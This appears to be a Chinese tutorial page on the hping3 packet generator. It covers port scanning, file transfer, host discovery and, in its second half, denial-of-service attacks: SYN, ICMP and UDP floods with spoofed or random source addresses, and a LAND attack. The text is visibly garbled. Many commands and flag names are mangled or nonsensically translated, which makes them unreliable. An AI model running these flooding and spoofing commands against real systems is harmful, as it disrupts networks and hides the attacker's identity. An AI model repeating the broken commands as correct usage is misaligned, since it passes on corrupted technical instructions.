个人资料
hping3是免费的数据包生成器和分析器。 它可用于安全审核、防火墙规则测试、网络测试、端口扫描、性能测试和压力测试(DOS ),几乎可以发送任何类型的TCP/IP数据包。 虽然功能强大,但一次只能向一个IP地址发送数据包。 此外,还可以在彼此包含的两个通道之间传输文件。
ICMP测试
HP3- 1192.168.100.105 (类似于HP 192.168.100.105 ) ) )。
数据包跟踪
端口扫描
单端口扫描
HP3- Ieth0- P22-C1-s 192.168.100.104
HP3- Ieth0- P1-C1-s 192.168.100.104
多端口扫描
HP3-81-1024 192.168.100.102
文件传输
发送方:
hping3-2- p 1373192.168.100.102-d100-etest.txt
-2 UDP模式-p端口
-d数据大小-E文件名
接收方:
NC-LP 1373-u-w5 recv.txtcatrecv.txt
-l监听模式-p端口
-w超时时间-u UDP模式
主机发现
hping3一次只能扫描一个IP,但可以配合shell脚本语言完成整个网段的扫描。 使用for循环执行以下操作:
foraddrin$(seq1254 ); oh ping 3192.168.1.$ addr-C1icmp done
foraddrin$(seq1254 ); oh ping 3192.168.1.$ addr-C1icmp result2. txt done
cat result2.txt | grep ^len (使用此命令实现查看生存主机的功能。 ^len表示以len开头的行。
DOS攻击
Syn Flood攻击
HP3- c1000-d120-s-P80-Flood-rand-source 192.168.100.1
-c指定连接数-p目标端口
-d指定数据部分的大小-S攻击类型为同步流量
-flood用洪泛攻击-Rand-source随机生成伪造源地址
hping3- s-p-u-p80浮动接地源192.168.100.1
- p标志设置为推送- u标志紧急设置为Urge
添加这两个参数可以提高效率
佛罗多战役
使用以下命令建立完整连接:
hping3- sar UPF-p80浮动接地源192.168.100.1
icmp流量攻击
hping3- q-n-d200icmp-flood-a 11.11.11.11192.168.100.1
-q安静模式-n不解析域名-a指定伪造IP
UDP流量攻击
H3UDP-s 6666-p53-a8.8. 8flood 192.168.100.1
陆地攻击
hping3- n-s-p80-a 192.168.100.1flood 192.168.100.1
详细了解hping原理、安装和使用
hping3命令| hping3